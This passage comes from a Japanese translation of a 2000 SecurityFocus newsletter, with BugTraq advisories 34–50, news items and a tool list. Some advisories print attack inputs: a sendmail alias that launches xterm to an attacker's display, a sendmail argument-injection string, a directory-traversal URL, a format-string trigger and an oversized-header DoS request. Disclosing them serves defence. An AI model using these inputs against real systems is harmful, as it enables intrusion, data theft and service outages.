含めた場合、 Web サーバのプロセスは signal 11 (SIGSEGV)、あるいは signal
10 (SIGBUS) で処理を停止してしまう。

34. Microsoft Proxy 2.0 Internal Network Access Vulnerability
BugTraq ID: 1692
リモートからの再現性: あり
公表日: 1998-12-17
関連するURL:
http://www.securityfocus.com/bid/1692
まとめ:

Microsoft Proxy Server 2.0 で保護された内部ネットワークへ、ポート番号
80 番への外部からのコネクションが無効になっていた場合でも、そのポート
番号を介して外部のネットワークから接続できてしまえる可能性が、発見され
た。

これは外部ネットワーク向けインタフェース用の NIC が同一 IP サブネット
として設定され、以下の GET リクエストを与えられた際に再現可能である。

GET http://target:port/HTTP/1.0<enter><enter>

35. Compaq Tru64 kdebugd Remote Arbitrary File Write Vulnerability
BugTraq ID: 1693
リモートからの再現性: あり
公表日: 2000-09-19
関連するURL:
http://www.securityfocus.com/bid/1693
まとめ:

Compaq 社が提供する Tru64 (旧 Digital Unix) はリモートからの重大な攻撃
を受け得るデーモンと共に出荷されている。inetd から起動される kdebugd
デーモンはクライアントからこのデーモンへ接続される初期化パケットを受け
付ける。このパケットには2種類の文字列が含まれ、1つは kdebugd で、もう
1つは kdebugd を起動しているサーバ上でログオン可能なセッションのための
オプション用ファイル名である。ここで指定されたファイルは、kdebugd によっ
て root 権限で、クライアントからの様々な入力内容の結果を書き込まれる事
になる。

このことは、適当に指定されたファイルが、適当な内容で書き込まれた際、
リモートから完全なまでにシステム権限を奪取されてしまえる可能性をもたら
している。
例えば、/etc/hosts.equiv を考えてみよう。このファイルへ + + が追加され
てしまった場合、いかなるホストから、ターゲットとなるホストへパスワード
なしで r サービスを使ってログイン可能である。なお、ターゲットへクライア
ントから直接ではなく、別の方法を用いて「ログファイル」へ特別のデータが
書き込まれた場合には、/etc/passwd へ項目を追加する等による、
「書式指定に依存する(syntax dependent)」攻撃の可能性は考えられない。
書き込まれる対象は、システム上に既に存在していなければならない。このため
攻撃者はすでに存在しない場合には、/.rhosts の作成はできない。

この問題はファイルシステム上のいかなるファイルの読み出しにも利用可能であ
る。攻撃者はこの問題を /etc/remote への書き込みを行うことに、まず利用する。
これは、/etc/passwd といった、最終的に読み出す対象のファイル名を
/etc/remote へ書き込むことになる。次いで、kdebugd へ再度接続し /etc/remote
へすでに書き込んだ内容に対してリクエストを行うのである。
この結果、kdebugd はターゲットとなったファイルをオープンし、クライアント
へ内容を送り出してしまうのである。

36. Multiple Linux Vendor  klogd Vulnerability
BugTraq ID: 1694
リモートからの再現性: 未詳
公表日: 2000-09-13
関連するURL:
http://www.securityfocus.com/bid/1694
まとめ:

klogd は Linux システム上で動作するデーモンであり、カーネルからのメッセー
ジを受け取り、ログファイルへ記録するために syslogd へそれを送るプログラム
である。このデーモンには「書式指定文字を利用した攻撃を受ける問題(format
string vulnerability)」があり、ローカルから root 権限を奪取できてしまえ、
特定の状況下においてはリモートからも奪取されてしまえる可能性がある。
この問題はユーザからの入力を受け入れたバッファ内容を、直接 syslog() 関
数へ代入してしまうために生じる。これは klogd.c の 680 行と 707 行にある
LogLine() 関数で生じる。

	Syslog( LOG_INFO, line_buff );

klogd によってシンボル名へ変換されるカーネルアドレスを示すための、カー
ネルメッセージ文字列中に '[<address>]' という注記が用いられている。
また、LogLine() 関数は書式指定文字列に関する問題を回避するために、%文字
に続けた文字を無視するが、'[<' と '>]' のデリミタの間の処理ではそれを行
わないのである。そのため、例えば、もしユーザがカーネルへ [<%s %s %s %s>]
という結果を出すようなメッセージを作成させた場合、klogd はセグメンテー
ションフォルトを生じてクラッシュしてしまう。
デバイス、モジュール、カーネルメッセージを作成するためのシステムコール
に依存することではあるが、この問題を突くことで、意図的な文字列をユーザ
が指定可能である。

37. Microsoft Proxy 2.0 FTP Permissions Bypass Vulnerability
BugTraq ID: 1695
リモートからの再現性: あり
公表日: 1999-07-19
関連するURL:
http://www.securityfocus.com/bid/1695
まとめ:

Microsoft Proxt 2.0 において、Web Proxy サービスのみが選択されている
場合(SOCKS、あるいは Winsock サービスは選択されていない場合)、リモー
トのユーザは FTP を利用し、Permissions タブでアクセスが許可されてい
ないファイルに対して読み出しを行う事が可能である。

38. Horde IMP Remote Command Execution via Sendmail Vulnerability
BugTraq ID: 1696
リモートからの再現性: なし
公表日: 2000-09-18
関連するURL:
http://www.securityfocus.com/bid/1696
まとめ:

IMP は Horde プロジェクトのメンバによって開発された、様々な機能を持つ
Web を利用したメールインタフェース/メールクライアントソフトウェアであ
る。すでに Bugtraq ID 1674 では、 IMAP が悪意あるユーザが意図するコマ
ンドを特定のユーザ入力が未チェックであるために実行できてしまえる、と
いう問題について概要を示している。この問題は IMAP バージョン 2.2.1 お
よび Horde バージョン 1.2.1 で部分的に修正され、ユーザの入力に対して、
それがシェル用のメタキャラクタがエスケープされたものかどうかについて
チェックを行うような機能が追加されている。

しかし、不幸にも、IMAP バージョン 2.2.1 および Horde バージョン 1.2.1
を動作させている Web サーバで sendmail の呼び出し方法を用いたコマンド
実行が可能になる問題、および IMP によるファイル情報の公開が生じてしま
う問題が残されている。問題は適用されたパッチがユーザの入力を popen()
へ直接与える事を禁止している部分にあり、この際、popen() は sendmail を
コマンドライン経由でのメール配送プログラムとして実行するために利用して
いる。しかし、PHP スクリプトはエスケープされたシェル用のメタキャラクタ
が与えられた場合、sendmail の引数として与えらえられるデータかどうかの
チェックをしないのである。この結果、特別のコマンドラインオプションを
sendmail へ FROM 変数の値に付け加える事で追加できてしまえるのである。
以上が問題の最初の部分である。

IMP の他の問題は、リモートからのコマンド実行が添付ファイルの取り扱い
方法を使って行えてしまえる点にある。添付ファイルがアップロードされた
後で、compose メッセージウインドゥ内の隠しフォーム値に IMP を動作させ
ている Web サーバ上のどこに一時ファイルを格納したかという情報が、格納
される(ファイル名は通常、php で始まり、/tmp に格納される。)。
この結果、攻撃者はローカル内へファイルを以下の手順で作成可能である。

 "evil@localhost: "|/usr/X11R6/bin/xterm -display attackers-ip:0.0"

さらに、これが以後、リモートのシステムの、既知のファイルシステム上へ
アップロードされてしまうのである。これは sendmail の alias ファイルの
形式であり、xterm を実行し、メールが evil@localhost へ配送された際に
リモートのシステム上で表示させる例である。

なお、攻撃者にとってこの alias ファイルは、このファイルが sendmail に
確かに利用されないのであれば、利用価値はない種のものである。

ローカルの環境において、sendmail はユーザに特定の設定パラメータをコマン
ドライン引数として指定して実行させることを許している。このため、"from"
に与えられた値を "x@x -O QueueDirectory=/tmp -O AliasFile=path-of-attachment -Fx"
の様に指定して実行することが可能である。これは、sendmail が PHP スクリ
プト経由で実行された場合、キューディレクトリを /tmp と設定し、alias ファ
イルをアップロードされた添付されたファイルと見なして実行されることを意
味する。

攻撃者は alias ファイルのアップロードが終わった後で、HTML のソースから
格納場所を入手し、"from" フィールドに意図するパラメータ文字列を設定し、
"To" フィールドに evil@localhost を設定し、処理を行わせるのである。
この場合、xterm は sendmail に渡されたメッセージの送り先として指定され
た相手を示す文字列に従って、悪意あるパラメータに指定された相手先へ送ら
れるのである。

これの、より洗練された「手段の組み合わせ」攻撃は、ファイルを公開してしま
うバグが、攻撃者のより複雑で重大な問題に対する攻撃を手助けすることになっ
てしまうかを示す、良い例である。

39. Tridia DoubleVision Local Root Compromise
BugTraq ID: 1697
リモートからの再現性: 未詳
公表日: 2000-09-16
関連するURL:
http://www.securityfocus.com/bid/1697
まとめ:

SCO UnixWare 7.x 用の Tridia DoubleVision ユーティリティ群にバッファ
オーバーフローを用いた攻撃を受けてしまう問題が発見された。

setuid root である dvtermtype はログイン時にユーザによって実行され、
DoubleVision がどのターミナル変換を利用するかを確認するプログラムであ
る。このプログラムのコマンドラインは以下に示す通りである。

$ dvtermtype termtype devicename

悪意あるユーザが termtype に長い文字列を与え、dvtermtype を実行した
場合、dvtermtype はスタックオーバーフローを生じる。
この結果、root 権限の奪取が引き起こされる可能性がある。

Tridia はサポートしている UNIX プラットフォーム毎に異なるリリーススケ
ジュールを予定している。従って他の UNIX 版の DoubleVision に問題があ
るかどうかは未詳である。

40. Cisco PIX Firewall SMTP Content Filtering Evasion Vulnerability
BugTraq ID: 1698
リモートからの再現性: あり
公表日: 2000-09-19
関連するURL:
http://www.securityfocus.com/bid/1698
まとめ:

他のファイヤウォール製品と同様に、Cisco PIX Firewall もアプリケーション
層でのフィルタリングを行うための通過するパケットの内容を読み取る技術を
実装している。この機能の中の SMTP について、特定の SMTP コマンドだけが
利用可能である様に設定可能である(例えば、HELP やセキュリティ上の関心を
呼ぶ EXPN あるいは VRFY 等の拡張機能を処理しない様にする)。
メッセージを受け取る際、すべてのテキストは DATA と"<CR><LF><CR><LF>.<CR><LF>"
の間に置かれ得、メッセージ中のボディはこの形式で通常処理され、ボディ内
の SMTP コマンドはフィルタされてはならない。
この際、SMTP、および PIX の例外条件の取り扱いのミスにより、SMTP コマン
ドの通過制限を、ファイヤウォールがメッセージのボディが送られていない場
合でも、送られてしまったとみなす様に解釈させることで回避できるとの報告
が成されている。

SMTP サーバ間の通信において、DATA コマンドが、RCPT TO 等のより重要な情
報が送られる前に、送られた際、SMTP サーバはステータス 503、つまり、
RCPT TOが必要、を返す。しかし、このファイヤウォールは全て正しいと見な
し、"<CR><LF><CR><LF>.<CR><LF>" が与えられるまですべてのコマンドを通過
させてしまうのである。
攻撃者はこの後、電子メールサーバに対して希望する行為を行うことが可能で
ある。

41. Microsoft Office 2000 DLL Execution Vulnerability
BugTraq ID: 1699
リモートからの再現性: あり
公表日: 2000-09-18
関連するURL:
http://www.securityfocus.com/bid/1699
まとめ:

'riched20.dll' あるいは 'msi.dll'、および他に特別に作成された DLL ファ
イルが様々な MS Office ファイルと共に同一のディレクトリに存在する場合、
ユーザに知られることなく DLL ファイルを実行可能である。
デフォルトで DLL ファイルはユーザに対しては見えない状態になっている。
(訳注: エクスプローラのデフォルトの表示設定がそうなっていることを示し
ています)

同一ディレクトリにある Office 文書が、「ファイル名を指定して実行」ある
いはエクスプローラ経由でアクセスできる場合、問題となる DLL は DllMain()
内のコードを実行する。これは Windows が DLL を利用するためのファイルの
サーチ順序に由来する。

ある、リモートの攻撃者がローカルのすべての管理権限を奪取してしまうとい
うシナリオを想定する。まず悪意ある DLL ファイルが 'riched20.dll' あるい
は 'msi.dll' として名前を変えて、アクセス可能な既知のフォルダに保存が行
われる。この場合、一度ユーザが DLL と同じディレクトリにある Office 文書
を開いた場合、悪意あるコードが実行されてしまうのである。

Excel 文書は 'riched20.dll' を自動的には実行しないが、 'msi.dll' は自動
的に実行してしまう。この問題はリモートにある UNC 共有においても同様に影
響を及ぼす。

42. KDE kvt Format String Vulnerability
BugTraq ID: 1700
リモートからの再現性: なし
公表日: 2000-09-19
関連するURL:
http://www.securityfocus.com/bid/1700
まとめ:

kvt は Qt を用いて作成された X Window 上で動作するターミナルエミュレータ
である。他の同種のプログラムと同様に、自身が所有する psuedo terminal
を持ち、utmp/wtmp へアクセスするため、setuid root でインストールされる。
しかし、kvt には書式指定文字列に関する問題(format-string vulnerability)
があるため、ローカルのユーザが root 権限を奪取可能である。kvt はユーザが
定義可能な DISPLAY 環境変数の値を文字列バッファへ割り当てる。この値はそ
の後、プログラム内では *printf() 関数へ唯一の引数として用いられてしまう。
なお、この問題を利用して kvt が攻撃可能かどうかは未詳である。

この問題は rxvt にも同様に存在する。これは kvt が rxvt から派生している
ためである。

43. Ipswitch WinCOM LPD 1.00.90 DoS Vulnerability
BugTraq ID: 1701
リモートからの再現性: あり
公表日: 2000-09-19
関連するURL:
http://www.securityfocus.com/bid/1701
まとめ:

WinCom LPD 1.00.90 は DoS を生じる可能性がある。ユーザが連続して LPD
へリクエストを、デフォルトのサービス待ち受けポート 515 番へ与えた場合、
プログラムは利用可能な CPU 資源を使い果たしてしまう。
サービスの再起動が通常動作への復旧には必要である。

44. NetcPlus BrowseGate 2.80 DoS Vulnerability
BugTraq ID: 1702
リモートからの再現性: あり
公表日: 2000-09-21
関連するURL:
http://www.securityfocus.com/bid/1702
まとめ:

NetcPlus BrowseGate 2.80 は、8K bytes を越える大量の文字列が、ポート
80 番経由で GET リクエストの引数に与えられた場合、クラッシュしてしま
う。

例えばこれは以下の場合に生じる。

GET / HTTP/1.0<cr>
Authorization: Basic(8 KB 程度の文字列)<cr>
From: email@address.com<cr>
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>
Referer: http://referrer/(8 KB 程度の文字列)<cr>
UserAgent: Browser 1.1<cr>
<cr><cr>

この場合、brwgate.exe は異常終了を生じ、通常動作への復旧は再起動が必
要である。

45. RedHat Glint /tmp Symbolic Link Vulnerability
BugTraq ID: 1703
リモートからの再現性: なし
公表日: 2000-09-19
関連するURL:
http://www.securityfocus.com/bid/1703
まとめ:

glint は RedHat Linux で提供されている rpm 形式のアーカイブからプログラ
ムをインストールするためのツールである。glint には、いかなるユーザであっ
ても書き込み可能な /tmp ディレクトリ内の一時ファイルの取り扱い方法に由来
した攻撃を受けてしまう問題がある。glint によって、ファイルは報告的に、予
測可能なファイル名で作成されてしまい、glint はまた、ファイルに書き込む際
に書き込み先ファイルが存在する場合、シンボリックを辿ってしまうのである。
この結果、攻撃者は /tmp にシンボリックリンクを、glint が実行される前に
glint が利用するファイル名で作成し、rpm がインストールされるためにroot
権限で glint が実行される場合(通常、これは管理者の典型的な作業である)、
シンボリックリンクで指し示された、予測された正しい名称に類推されたファ
イルは上書きされる。この行為はシステムの DoS を招く(例えばこれが、
/etc/passwd が上書きされた場合である)。

しかし、glint は setuid root でインストールされたプログラムではないため、
root で実行されていることを意味する(root だけが書き込み可能なディレクト
リへソフトウェアをインストールするためにこのソフトウェアは用いられるの
である)。このため攻撃者はシンボリックリンクを作成後、root が実行するの
を待つ。rpm 3.0 では glint を廃止している。このためこのバージョンを運用
しているシステムでは glint が存在する場合には削除することで対策を施せる。

46. Extent RBS ISP Directory Traversal Vulnerability
BugTraq ID: 1704
リモートからの再現性: あり
公表日: 2000-09-21
関連する URL:
http://www.securityfocus.com/bid/1704
まとめ:

Extent RBS ISP を稼動しているホストは、リモートユーザがディレクトリを相
対パスで参照することで、プログラム本体が置いてあるディレクトリに存在す
る任意のファイルを読み出されてしまう。8002 番ポートへのリクエストの
'image'変数に'../'を付加することで、ユーザはクレジットカードの情報や、
ユーザ名、パスワードなどの内容が記載されている任意のファイルを読む事が
可能である。

例:

http://target:8002/Newuser?Image=../../database/rbsserv.mdb

47. CiscoSecure ACS for Windows NT Buffer Overflow Vulnerability
BugTraq ID: 1705
リモートからの再現性: あり
公表日: 2000-09-21
関連する URL:
http://www.securityfocus.com/bid/1705
まとめ:

予期されているサイズ以上のパケットを 2002 番ポートに送られるといったよ
うに入力されたデータ次第ではあるが、CiscoSecure ACS for Windows NT は
クラッシュされてしまう可能性があり、また、任意のプログラムの実行の可能
性がある。

アプリケーションが予期されたサイズ以上のパケットのためにクラッシュした
場合、バージョン 2.3x とそれ以降なら、CSadmin モジュールは 1 分後に自動
的に再起動する。クラッシュ前に存在しているセッションは再び認証される必
要があるが、再起動後、再びコネクションは確立する。
2.3x 以前のバージョンでは、通常の機能を回復するために、手動での再起動が
必要となる。


48. CiscoSecure ACS for Windows NT Oversized TACACS+ Packet DoS Vulnerability
BugTraq ID: 1706
リモートからの再現性: あり
公表日: 2000-09-21
関連する URL:
http://www.securityfocus.com/bid/1706
まとめ:

リモートからの攻撃者が、CiscoSecure ACS for Windows NT が稼動しているサ
ーバと TACACS+ を実行しているクライアントとの間のトラヒックを盗聴でき、
または、トラフィックを増加させることができる場合、CiscoSecure ACS
for Windows NT は、TACACS+ が予期された以上のサイズのパケットを送信すれ
クラッシュすることが可能である。

49. SuSE Installed Package Disclosure Vulnerability
BugTraq ID: 1707
リモートからの再現性: あり
公表日: 2000-09-21
関連する URL:
http://www.securityfocus.com/bid/1707
まとめ:

"http://hosts.any/doc/packages/" という URL を Web サーバに送信する事に
よって、いかなるホストのどのユーザであっても SuSE 6.4 system にインスト
ールされているパッケージのリストを取得することが可能である。SuSE の 6.4
以外のバージョンに、この弱点があるかどうか、現在のところ未詳である。

50. CiscoSecure ACS for Windows NT and LDAP Server Null Password Vulnerability
BugTraq ID: 1708
リモートからの再現性: あり
公表日: 2000-09-21
関連する URL:
http://www.securityfocus.com/bid/1708
まとめ:

複数の Lightweight Directory Access Protocol (LDAP) サーバのある種には、
パスワードを設定していないユーザを許可してしまう製品がある。
CiscoSecure ACS for Windows NT が空のパスワードを含んだ LDAP サーバとの
接続に利用された場合、リモートユーザは認証を受けることなく、通常はアク
セスできないはずのルータやスイッチの権限を奪取できてしまう。

III. SECURITYFOCUS.COM NEWS AND COMMENTARY
- ------------------------------------------
1. The Cybercitizenship Charade

著者: Kevin Poulsen
September 25, 2000

両親へのよくある質問です。あなたの子供がインターネットから著作権のある
音楽をダウンロードすることは違法ですか?

もし「いいえ、違法ではありません。」と答えたなら、著作権のある音楽をオ
ンラインでの利用を許している何万ものアーティストや現実世界と同様に Web
上でも"公正な利用"のみ許しているとアーティストもいる事実に気付かされる
でしょう。

しかし、Cybercitizenship.org によると、米国司法省と Information Technology
Association of America (ITAA) によって親を教育するための新しい Web サイ
トが作成されていて、そこには、「いいえ」という答えは、次の事を意味する
に過ぎないとあります。「あなたは、オンライン上で、善悪の区別を付けるこ
とができない多数の親と同じです。」

http://www.securityfocus.com/templates/article.html?id=91

2. Bill Would Restrict Carnivore

著者: Kevin Poulsen
September 21, 2000 4:22 PM PT

米国下院司法委員会は、火曜日に、論議を呼んでいる Carnivore 電子メール監
視ツールを FBI が使用することについて法的な新しいハードルを設置するとい
う法案について投票を行う予定です。

Electronic Communication Privacy Act of 2000 (HR 5018) の下では、法を施
行している政府機関は、Carnivore の主要な利用目的の犯罪捜査に役に立つ情
報の判定のために電子メールの 'From:'と'To:'行を採取していないと、FBI と
司法省は議会で証言している。

http://www.securityfocus.com/templates/article.html?id=90

3. Hackers skin CueCat

著者: Kevin Poulsen
September 19, 2000 3:38 PM PT

100 万個の猫型のバーコードスキャナを雑誌の購読者とRadio Shack の購買者
に提供したインターネット会社は、どのように猫型のお試し品が利用されたか
ということでクラッカーとの小競り合いに勝利したと主張している。

"我々は認証をしていなかったという退屈な声明を出さざるをえなかった。
我々は猫のデータを暗号化した、君たちは復号出力を得られなかった"
とダラスに本拠地を置く Digital Convergence 新技術部門の副社長
David Mathews は語った。

http://www.securityfocus.com/templates/article.html?id=89

4. Digital Convergence data Leaks

著者: Kevin Poulsen
September 19, 2000 3:35 PM PT

100 万個の猫型のバーコードスキャナを雑誌の購読ルートと Radio Shack の小
売りを通して提供したインターネット会社は、月曜日に、不注意に以下のよう
な情報まで提供してしまったことを認めた: 名前、電子メールアドレス、郵便
番号、性別、CueCat "convergence kit" のユーザ登録した 150,000 人の年齢
分布のリスト。

"われわれはサイトの関係したエリアをセキュアにして、セキュリティの検査を
するために週末を全て費やした"と Digital Convergence のスポークスマン
Molly Reilly は話した。

http://www.securityfocus.com/templates/article.html?id=88


IV.SECURITY FOCUS TOP 6 TOOLS
- -----------------------------
1.SAINT - Security Administrator's Integrated Network Tool 3.0 Beta 1
(AIX, BSDI, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, Solaris, SunOS,
Ultrix)
World Wide Digital Security, Inc. (saint@wwdsi.com)
関連する URL:
	http://wwdsilx.wwdsi.com/saint/

SAINT (Security Administrator's Integrated Network Tool) は、SATAN を基
礎としたセキュリティ評価ツールです。定期的に更新され、リモートから検知
できる弱点について検査します。ファイアウォールを通しての検査、CERT や
CIAC の bulletin からセキュリティの検査項目の更新、4 段階の重大性評価
(レッド、イエロー、ブラウン、グリーン) などの機能があり、使いやすい
HTML のインターフェイスを備えています。変更点: このリリースでは、ftpd
の setproctitle に関する弱点 (HP-UX、OpenBSD、ProFTP のチェックが追加さ
れました)、Linux の statd format string に関する弱点、Big Brother (2 つ
の弱点)、Apache: ASP (source.asp)、Poll It、guestbook.cgi、Excite for
Web Servers、OmniHTTPD (imagemap.exe)、Mini SQL (w3-msql)、AltaVista
search engine のチェックが追加されました。

2. Security Auditor's Research Assistant (SARA) 3.2.1 (Linux)
作者: Advanced Research Corporation
関連する URL:
	http://www-arc.com/sara/

Security Auditor's Research Assistant (SARA) は、SATAN モデルに基づいた
セキュリティ解析ツールです。最新の脅威に対応するために定期的に更新され
ます。既知のセキュリティホール、バックドア、信頼関係、デフォルトの CGI、
共通のログインをチェックします。変更点: FrontPage の検査方法を修正、RPC
プログラムのチェックを追加、tacacs サーバの検査の追加、 Sub 7 のバック
ドアの検査の追加、JetAdmin のディレクトリ参照に関する検査の追加、QPOP
3.53 の弱点の検査の追加、 Cisco Catalyst の弱点の検査の追加、Suse IMAP
サーバの検査を追加、バグの修正とパフォーマンスの向上がなされました。
Incorporated SANS は、wu-ftpd 2.6.0 の検査やバグの修正がなされている
SANS/SARA Top 10 の追加を推奨しています。smb.sara の改善、network.vbs
検査の追加、不正な負数を削除する ftp.sara にある問題の修正、最新の
Perl へのアップデートがなされました。

3. Screen Logger 1.0 (Windows 95/98, Windows NT)
作者: Mikko Technology, support@mikkotech.com
関連する URL:
	http://www.mikkotech.com/sl.html

Screen Logger はディスプレイの画像に関するハンディカムのようなソフトウ
エアです。 画面上に表示されるすべてを記録することができます。Screen
Logger の主要な機能は、画面をキャプチャすることと、それをいつでも見るこ
とができるようにログに取ることです。これは、あなたがした仕事のバックア
ップを取るときや、コンピュータのトラブるシューティングをするとき、また
は、あなたがコンピュータから離れている間に何が起きたかを知りたいときで
さえも、非常に重要な機能でしょう。画面をキャプチャし、ログに残すことは、
コンピュータで何が起きているかをあなたに知らせるでしょう。

4. chkrootkit 0.17 (FreeBSD, Linux, Solaris)
作者: Nelson Murilo (nelson@pangeia.com.br)
関連する URL:
	ftp://ftp.pangeia.com.br/pub/seg/pac/

chkrootkit V. 0.17 はローカルに rootkit が仕込まれているかどうかの兆候
を調べます。LKM rootkitの検知、インターフェイスがプロミスキャスモードに
あるかどうかをチェックするための ifpromisc.c、lastlog の削除をチェック
するための chklastlog.c、wtmp の削除をチェックする chkwtmp.c を含んで
います。Linux、FreeBSD、Solaris で動作確認がなされています。
変更点: Tornkit など rootkit の最新で有名なものへのテストが追加されま
した。LKM rootkit を特定できるようにしています。

5. BUGS 3.4.0
( FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris, SunOS, UNIX,
Windows 2000, Windows 3.x, Windows 95/98 and Windows NT
作者: Sylvain Martinez (martinez@encryptsolutions.com
関連する URL:
	http://www.bcrypt.com

BUGS は強力な秘密鍵暗号アルゴリズムとそのアプリケーションです。使用する
ことは難しくなく、サンプルアプリケーションとドキュメントがあります。こ
の暗号のライブラリはフリーで利用することができます。マルチプラットフォ
ームに対応し、オープンソースで、ファイル暗号化アプリケーション、セキュ
アなチャット、セキュアな"more"コマンド、ログインアプリケーションなどか
らなるパッケージが提供されています。

6. Winfingerprint 2.2.9 (Netware, Windows 95/98, Windows NT)
作者: Kirby Kuehl (vacuum@technotronic.com)
関連する URL:
	http://www.technotronic.com/winfingerprint/

リモートから Windows OS を特定する最先端のソフトウエアです。現在の特長:
SMB Queries を利用している OS、PDC (Primary Domain Controller)、BDC
(Backup Domain Controller)、NT MEMBER SERVER、NT WORKSTATION、SQLSERVER、
NOVELL NETWARE SERVER、WINDOWS FOR WORKGROUPS、WINDOWS 9X の特定、
Administrative ($) を含んだ共有の列挙(訳注: 管理共有)、
グローバルグループの列挙、ユーザの列挙、稼動しているサービスの表示、ネッ
トワークのまわりを検査する機能、NULL IPC$ セッションを確立する機能、レ
ジストリを調べる機能 (現在、適用されているサービスパックのレベルやホット
フィックスの決定が可能)。
変更点:  列挙、共有、グループ、ユーザ、サービス、通信、時間、OS バージ
ョンの決定、サービスパックとホットフィックスのレベル、HTML 形式での出力。

- --
Translated by SAKAI Yoriyuki, KAGEYAMA Tetsuya
Little eArth Corporation - LAC Co., Ltd.
http://www.lac.co.jp/security/

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Edition 5.5.5J
Comment: SAKAI Yoriyuki

iQA/AwUBOdE1XpQwtHQKfXtrEQKd/wCg7+in9cya2B1qOJQaqOyPDz+u2j0An3Lm
wyvAEReDOT3h5vl2ZcIwa543
=ZpyY
-----END PGP SIGNATURE-----